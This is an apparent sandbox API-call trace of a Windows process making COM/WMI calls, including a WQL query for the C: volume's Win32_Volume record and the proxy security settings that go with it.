	[0172.469] CoGetContextToken (in: pToken=0x1c6ec160 | out: pToken=0x1c6ec160) returned 0x0
	[0172.469] WbemLocator:IUnknown:QueryInterface (in: This=0x1b848530, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec120 | out: ppvObject=0x1c6ec120*=0x1b848418) returned 0x0
	[0172.470] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b848418, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ec150 | out: pCid=0x1c6ec150*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0172.470] WbemLocator:IUnknown:Release (This=0x1b848418) returned 0x3
	[0172.470] CoGetContextToken (in: pToken=0x1c6ec130 | out: pToken=0x1c6ec130) returned 0x0
	[0172.470] WbemLocator:IUnknown:AddRef (This=0x1b848530) returned 0x4
	[0172.470] WbemLocator:IUnknown:QueryInterface (in: This=0x1b848530, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec248 | out: ppvObject=0x1c6ec248*=0x1b848500) returned 0x0
	[0172.471] WbemLocator:IUnknown:Release (This=0x1b848530) returned 0x4
	[0172.471] WbemLocator:IRpcOptions:Query (in: This=0x1b848500, pPrx=0x1b848530, dwProperty=2, pdwValue=0x1c6ec2b8 | out: pdwValue=0x1c6ec2b8) returned 0x80004002
	[0172.471] WbemLocator:IUnknown:Release (This=0x1b848500) returned 0x3
	[0172.472] WbemLocator:IUnknown:Release (This=0x1b848530) returned 0x2
	[0172.472] CoGetContextToken (in: pToken=0x1c6ec630 | out: pToken=0x1c6ec630) returned 0x0
	[0172.472] CoGetContextToken (in: pToken=0x1c6ec570 | out: pToken=0x1c6ec570) returned 0x0
	[0172.473] WbemLocator:IUnknown:AddRef (This=0x1b848530) returned 0x3
	[0172.473] WbemLocator:IUnknown:QueryInterface (in: This=0x1b848530, riid=0x1c6ec6b0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c6ec690 | out: ppvObject=0x1c6ec690*=0x1cd144f8) returned 0x0
	[0172.473] WbemLocator:IUnknown:Release (This=0x1b848530) returned 0x3
	[0172.473] WbemLocator:IUnknown:Release (This=0x1cd144f8) returned 0x2
	[0172.476] WbemLocator:IUnknown:Release (This=0x1cd144f8) returned 0x1
	[0172.477] CoGetContextToken (in: pToken=0x1c6ecc30 | out: pToken=0x1c6ecc30) returned 0x0
	[0172.477] WbemLocator:IUnknown:AddRef (This=0x1b848530) returned 0x2
	[0172.477] WbemLocator:IUnknown:QueryInterface (in: This=0x1b848530, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec800 | out: ppvObject=0x1c6ec800*=0x1b848530) returned 0x0
	[0172.477] WbemLocator:IUnknown:Release (This=0x1b848530) returned 0x2
	[0172.477] WbemLocator:IUnknown:Release (This=0x1b848530) returned 0x1
	[0172.478] CoGetContextToken (in: pToken=0x1c6ec8d0 | out: pToken=0x1c6ec8d0) returned 0x0
	[0172.478] CoGetContextToken (in: pToken=0x1c6ec810 | out: pToken=0x1c6ec810) returned 0x0
	[0172.478] WbemLocator:IUnknown:AddRef (This=0x1b848530) returned 0x2
	[0172.478] WbemLocator:IUnknown:QueryInterface (in: This=0x1b848530, riid=0x1c6ec950*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c6ec930 | out: ppvObject=0x1c6ec930*=0x1cd144f8) returned 0x0
	[0172.478] WbemLocator:IUnknown:Release (This=0x1b848530) returned 0x2
	[0172.478] WbemLocator:IUnknown:AddRef (This=0x1cd144f8) returned 0x3
	[0172.478] IWbemServices:ExecQuery (in: This=0x1cd144f8, strQueryLanguage="WQL", strQuery="select * from Win32_Volume where Name='C:\\\\'", lFlags=16, pCtx=0x0, ppEnum=0x1c6ecdc8 | out: ppEnum=0x1c6ecdc8*=0x1cd145f8) returned 0x0
	[0172.505] IUnknown:QueryInterface (in: This=0x1cd145f8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec9d8 | out: ppvObject=0x1c6ec9d8*=0x1cd14600) returned 0x0
	[0172.505] IClientSecurity:QueryBlanket (in: This=0x1cd14600, pProxy=0x1cd145f8, pAuthnSvc=0x1c6ec9d0, pAuthzSvc=0x1c6ec9cc, pServerPrincName=0x1c6ec9f8, pAuthnLevel=0x1c6ec9c8, pImpLevel=0x1c6ec9e4, pAuthInfo=0x1c6eca08, pCapabilites=0x1c6ec9e0 | out: pAuthnSvc=0x1c6ec9d0*=0xa, pAuthzSvc=0x1c6ec9cc*=0x0, pServerPrincName=0x1c6ec9f8, pAuthnLevel=0x1c6ec9c8*=0x6, pImpLevel=0x1c6ec9e4*=0x2, pAuthInfo=0x1c6eca08, pCapabilites=0x1c6ec9e0*=0x1) returned 0x0
	[0172.505] IUnknown:Release (This=0x1cd14600) returned 0x1
	[0172.505] IUnknown:QueryInterface (in: This=0x1cd145f8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec978 | out: ppvObject=0x1c6ec978*=0x1b842860) returned 0x0
	[0172.505] IUnknown:QueryInterface (in: This=0x1cd145f8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec908 | out: ppvObject=0x1c6ec908*=0x1cd14600) returned 0x0
	[0172.505] IClientSecurity:SetBlanket (This=0x1cd14600, pProxy=0x1cd145f8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0172.648] IUnknown:Release (This=0x1cd14600) returned 0x2
	[0172.648] WbemLocator:IUnknown:Release (This=0x1b842860) returned 0x1
	[0172.648] CoTaskMemFree (pv=0x1b844d70) 
	[0172.648] IUnknown:QueryInterface (in: This=0x1cd145f8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec5b0 | out: ppvObject=0x1c6ec5b0*=0x1b842860) returned 0x0
	[0172.648] WbemLocator:IUnknown:QueryInterface (in: This=0x1b842860, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec630 | out: ppvObject=0x1c6ec630*=0x0) returned 0x80004002
	[0172.651] WbemLocator:IUnknown:QueryInterface (in: This=0x1b842860, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec3c8 | out: ppvObject=0x1c6ec3c8*=0x0) returned 0x80004002
	[0172.655] WbemLocator:IUnknown:AddRef (This=0x1b842860) returned 0x3
	[0172.655] CoGetContextToken (in: pToken=0x1c6ec280 | out: pToken=0x1c6ec280) returned 0x0
	[0172.655] WbemLocator:IUnknown:QueryInterface (in: This=0x1b842860, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec240 | out: ppvObject=0x1c6ec240*=0x1b842748) returned 0x0
	[0172.655] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b842748, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ec270 | out: pCid=0x1c6ec270*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0172.655] WbemLocator:IUnknown:Release (This=0x1b842748) returned 0x3
	[0172.656] CoGetContextToken (in: pToken=0x1c6ec250 | out: pToken=0x1c6ec250) returned 0x0
	[0172.656] WbemLocator:IUnknown:AddRef (This=0x1b842860) returned 0x4
	[0172.656] WbemLocator:IUnknown:QueryInterface (in: This=0x1b842860, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec368 | out: ppvObject=0x1c6ec368*=0x1b842830) returned 0x0
	[0172.656] WbemLocator:IUnknown:Release (This=0x1b842860) returned 0x4
	[0172.657] WbemLocator:IRpcOptions:Query (in: This=0x1b842830, pPrx=0x1b842860, dwProperty=2, pdwValue=0x1c6ec3d8 | out: pdwValue=0x1c6ec3d8) returned 0x80004002
	[0172.657] WbemLocator:IUnknown:Release (This=0x1b842830) returned 0x3
	[0172.657] WbemLocator:IUnknown:Release (This=0x1b842860) returned 0x2
	[0172.657] CoGetContextToken (in: pToken=0x1c6ec750 | out: pToken=0x1c6ec750) returned 0x0
	[0172.657] CoGetContextToken (in: pToken=0x1c6ec690 | out: pToken=0x1c6ec690) returned 0x0
	[0172.657] WbemLocator:IUnknown:AddRef (This=0x1b842860) returned 0x3
	[0172.657] WbemLocator:IUnknown:QueryInterface (in: This=0x1b842860, riid=0x1c6ec7d0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ec7b0 | out: ppvObject=0x1c6ec7b0*=0x1cd145f8) returned 0x0
	[0172.658] WbemLocator:IUnknown:Release (This=0x1b842860) returned 0x3
	[0172.658] IUnknown:Release (This=0x1cd145f8) returned 0x2
	[0172.658] IUnknown:Release (This=0x1cd145f8) returned 0x1
	[0172.658] WbemLocator:IUnknown:Release (This=0x1cd144f8) returned 0x2
	[0172.659] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd01390, puCount=0x1c6ecd70 | out: puCount=0x1c6ecd70*=0x2) returned 0x0
	[0172.659] WbemDefPath:IWbemPath:GetText (in: This=0x1cd01390, lFlags=4, puBuffLength=0x1c6ecd70*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecd70*=0x17, pszText=0x0) returned 0x0
	[0172.659] WbemDefPath:IWbemPath:GetText (in: This=0x1cd01390, lFlags=4, puBuffLength=0x1c6ecd70*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecd70*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0172.664] CoGetContextToken (in: pToken=0x1c6ec970 | out: pToken=0x1c6ec970) returned 0x0
	[0172.664] CoGetContextToken (in: pToken=0x1c6ec8b0 | out: pToken=0x1c6ec8b0) returned 0x0
	[0172.664] WbemLocator:IUnknown:AddRef (This=0x1b842860) returned 0x2
	[0172.664] WbemLocator:IUnknown:QueryInterface (in: This=0x1b842860, riid=0x1c6ec9f0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ec9d0 | out: ppvObject=0x1c6ec9d0*=0x1cd145f8) returned 0x0
	[0172.664] WbemLocator:IUnknown:Release (This=0x1b842860) returned 0x2
	[0172.665] IUnknown:AddRef (This=0x1cd145f8) returned 0x3
	[0172.665] IEnumWbemClassObject:Clone (in: This=0x1cd145f8, ppEnum=0x1c6ece30 | out: ppEnum=0x1c6ece30*=0x1cd14788) returned 0x0
	[0172.669] IUnknown:QueryInterface (in: This=0x1cd14788, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6eca88 | out: ppvObject=0x1c6eca88*=0x1cd14790) returned 0x0
	[0172.669] IClientSecurity:QueryBlanket (in: This=0x1cd14790, pProxy=0x1cd14788, pAuthnSvc=0x1c6eca80, pAuthzSvc=0x1c6eca7c, pServerPrincName=0x1c6ecaa8, pAuthnLevel=0x1c6eca78, pImpLevel=0x1c6eca94, pAuthInfo=0x1c6ecab8, pCapabilites=0x1c6eca90 | out: pAuthnSvc=0x1c6eca80*=0xa, pAuthzSvc=0x1c6eca7c*=0x0, pServerPrincName=0x1c6ecaa8, pAuthnLevel=0x1c6eca78*=0x6, pImpLevel=0x1c6eca94*=0x2, pAuthInfo=0x1c6ecab8, pCapabilites=0x1c6eca90*=0x1) returned 0x0
	[0172.669] IUnknown:Release (This=0x1cd14790) returned 0x1
	[0172.669] IUnknown:QueryInterface (in: This=0x1cd14788, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6eca28 | out: ppvObject=0x1c6eca28*=0x1b849130) returned 0x0
	[0172.670] IUnknown:QueryInterface (in: This=0x1cd14788, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec9b8 | out: ppvObject=0x1c6ec9b8*=0x1cd14790) returned 0x0
	[0172.670] IClientSecurity:SetBlanket (This=0x1cd14790, pProxy=0x1cd14788, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0172.682] IUnknown:Release (This=0x1cd14790) returned 0x2
	[0172.682] WbemLocator:IUnknown:Release (This=0x1b849130) returned 0x1
	[0172.682] CoTaskMemFree (pv=0x1b844da0) 
	[0172.682] IUnknown:QueryInterface (in: This=0x1cd14788, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec650 | out: ppvObject=0x1c6ec650*=0x1b849130) returned 0x0
	[0172.682] WbemLocator:IUnknown:QueryInterface (in: This=0x1b849130, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec6d0 | out: ppvObject=0x1c6ec6d0*=0x0) returned 0x80004002
	[0172.697] WbemLocator:IUnknown:QueryInterface (in: This=0x1b849130, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec468 | out: ppvObject=0x1c6ec468*=0x0) returned 0x80004002
	[0172.698] WbemLocator:IUnknown:AddRef (This=0x1b849130) returned 0x3
	[0172.698] CoGetContextToken (in: pToken=0x1c6ec320 | out: pToken=0x1c6ec320) returned 0x0
	[0172.698] WbemLocator:IUnknown:QueryInterface (in: This=0x1b849130, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec2e0 | out: ppvObject=0x1c6ec2e0*=0x1b849018) returned 0x0
	[0172.698] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b849018, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ec310 | out: pCid=0x1c6ec310*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0172.698] WbemLocator:IUnknown:Release (This=0x1b849018) returned 0x3
	[0172.698] CoGetContextToken (in: pToken=0x1c6ec2f0 | out: pToken=0x1c6ec2f0) returned 0x0
	[0172.698] WbemLocator:IUnknown:AddRef (This=0x1b849130) returned 0x4
	[0172.698] WbemLocator:IUnknown:QueryInterface (in: This=0x1b849130, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec408 | out: ppvObject=0x1c6ec408*=0x1b849100) returned 0x0
	[0172.699] WbemLocator:IUnknown:Release (This=0x1b849130) returned 0x4
	[0172.699] WbemLocator:IRpcOptions:Query (in: This=0x1b849100, pPrx=0x1b849130, dwProperty=2, pdwValue=0x1c6ec478 | out: pdwValue=0x1c6ec478) returned 0x80004002
	[0172.699] WbemLocator:IUnknown:Release (This=0x1b849100) returned 0x3
	[0172.699] WbemLocator:IUnknown:Release (This=0x1b849130) returned 0x2
	[0172.699] CoGetContextToken (in: pToken=0x1c6ec7f0 | out: pToken=0x1c6ec7f0) returned 0x0
	[0172.699] CoGetContextToken (in: pToken=0x1c6ec730 | out: pToken=0x1c6ec730) returned 0x0
	[0172.699] WbemLocator:IUnknown:AddRef (This=0x1b849130) returned 0x3
	[0172.699] WbemLocator:IUnknown:QueryInterface (in: This=0x1b849130, riid=0x1c6ec870*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ec850 | out: ppvObject=0x1c6ec850*=0x1cd14788) returned 0x0
	[0172.699] WbemLocator:IUnknown:Release (This=0x1b849130) returned 0x3
	[0172.699] IUnknown:Release (This=0x1cd14788) returned 0x2
	[0172.699] IUnknown:Release (This=0x1cd14788) returned 0x1
	[0172.700] IUnknown:Release (This=0x1cd145f8) returned 0x2
	[0172.701] CoGetContextToken (in: pToken=0x1c6ecbf0 | out: pToken=0x1c6ecbf0) returned 0x0
	[0172.701] CoGetContextToken (in: pToken=0x1c6ecb30 | out: pToken=0x1c6ecb30) returned 0x0
	[0172.701] WbemLocator:IUnknown:AddRef (This=0x1b849130) returned 0x2
	[0172.701] WbemLocator:IUnknown:QueryInterface (in: This=0x1b849130, riid=0x1c6ecc70*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c6ecc50 | out: ppvObject=0x1c6ecc50*=0x1cd14788) returned 0x0
	[0172.701] WbemLocator:IUnknown:Release (This=0x1b849130) returned 0x2
	[0172.701] IUnknown:AddRef (This=0x1cd14788) returned 0x3
	[0172.701] IEnumWbemClassObject:Reset (This=0x1cd14788) returned 0x0
	[0172.737] IUnknown:Release (This=0x1cd14788) returned 0x2
	[0172.743] CoTaskMemAlloc (cb=0x8) returned 0x1b820dc0
	[0172.743] IEnumWbemClassObject:Next (in: This=0x1cd14788, lTimeout=-1, uCount=0x1, apObjects=0x1b820dc0, puReturned=0x1c6ece78 | out: apObjects=0x1b820dc0*=0x1cd14830, puReturned=0x1c6ece78*=0x1) returned 0x0
	[0175.182] IUnknown:QueryInterface (in: This=0x1cd14830, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec1a0 | out: ppvObject=0x1c6ec1a0*=0x1cd14830) returned 0x0
	[0175.182] IUnknown:QueryInterface (in: This=0x1cd14830, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec220 | out: ppvObject=0x1c6ec220*=0x0) returned 0x80004002
	[0175.183] IUnknown:QueryInterface (in: This=0x1cd14830, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ebfb8 | out: ppvObject=0x1c6ebfb8*=0x0) returned 0x80004002
	[0175.183] IUnknown:AddRef (This=0x1cd14830) returned 0x3
	[0175.183] CoGetContextToken (in: pToken=0x1c6ebe70 | out: pToken=0x1c6ebe70) returned 0x0
	[0175.183] IUnknown:QueryInterface (in: This=0x1cd14830, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebe30 | out: ppvObject=0x1c6ebe30*=0x1cd14838) returned 0x0
	[0175.183] IMarshal:GetUnmarshalClass (in: This=0x1cd14838, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ebe60 | out: pCid=0x1c6ebe60*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0175.184] IUnknown:Release (This=0x1cd14838) returned 0x3
	[0175.184] CoGetContextToken (in: pToken=0x1c6ebe40 | out: pToken=0x1c6ebe40) returned 0x0
	[0175.184] IUnknown:AddRef (This=0x1cd14830) returned 0x4
	[0175.184] IUnknown:QueryInterface (in: This=0x1cd14830, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebf58 | out: ppvObject=0x1c6ebf58*=0x0) returned 0x80004002
	[0175.184] IUnknown:Release (This=0x1cd14830) returned 0x3
	[0175.184] IUnknown:Release (This=0x1cd14830) returned 0x2
	[0175.184] CoGetContextToken (in: pToken=0x1c6ec300 | out: pToken=0x1c6ec300) returned 0x0
	[0175.184] CoGetContextToken (in: pToken=0x1c6ec240 | out: pToken=0x1c6ec240) returned 0x0
	[0175.184] IUnknown:AddRef (This=0x1cd14830) returned 0x3
	[0175.184] IUnknown:QueryInterface (in: This=0x1cd14830, riid=0x1c6ec380*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c6ec360 | out: ppvObject=0x1c6ec360*=0x1cd14830) returned 0x0
	[0175.184] IUnknown:Release (This=0x1cd14830) returned 0x3
	[0175.185] IUnknown:Release (This=0x1cd14830) returned 0x2
	[0175.185] IUnknown:Release (This=0x1cd14830) returned 0x1
	[0175.185] CoTaskMemFree (pv=0x1b820dc0) 
	[0175.185] CoGetContextToken (in: pToken=0x1c6ecc80 | out: pToken=0x1c6ecc80) returned 0x0
	[0175.185] IUnknown:AddRef (This=0x1cd14830) returned 0x2
	[0175.190] IWbemClassObject:Get (in: This=0x1cd14830, wszName="__GENUS", lFlags=0, pVal=0x1c6ecdf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecdec*=0, plFlavor=0x1c6ecde8*=0 | out: pVal=0x1c6ecdf0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c6ecdec*=3, plFlavor=0x1c6ecde8*=64) returned 0x0
	[0175.209] IWbemClassObject:Get (in: This=0x1cd14830, wszName="__PATH", lFlags=0, pVal=0x1c6ecd90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecd8c*=0, plFlavor=0x1c6ecd88*=0 | out: pVal=0x1c6ecd90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"", varVal2=0x0), pType=0x1c6ecd8c*=8, plFlavor=0x1c6ecd88*=64) returned 0x0
	[0175.210] SysStringLen (param_1="\\\\XDUWTFONO\\root\\cimv2:Win32_Volume.DeviceID=\"\\\\\\\\?\\\\Volume{92eb13a2-4a1d-11e7-bae1-806e6f6e6963}\\\\\"") returned 0x64
	[0175.210] CoGetObjectContext (in: riid=0x1c6ecd28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ecd20 | out: ppv=0x1c6ecd20*=0x321868) returned 0x0
	[0175.210] IComThreadingInfo:GetCurrentApartmentType (in: This=0x321868, pAptType=0x1c6ecd40 | out: pAptType=0x1c6ecd40*=1) returned 0x0
	[0175.210] IUnknown:QueryInterface (in: This=0x321868, riid=0x3008a28*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c6ece48 | out: ppvObject=0x1c6ece48*=0x0) returned 0x80004002
	[0175.210] IUnknown:Release (This=0x321868) returned 0x1
	[0175.211] CoGetClassObject (in: rclsid=0x1b82a358*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ec3b0 | out: ppv=0x1c6ec3b0*=0x1cd11720) returned 0x0
	[0175.211] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd11720, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec0c0 | out: ppvObject=0x1c6ec0c0*=0x0) returned 0x80004002
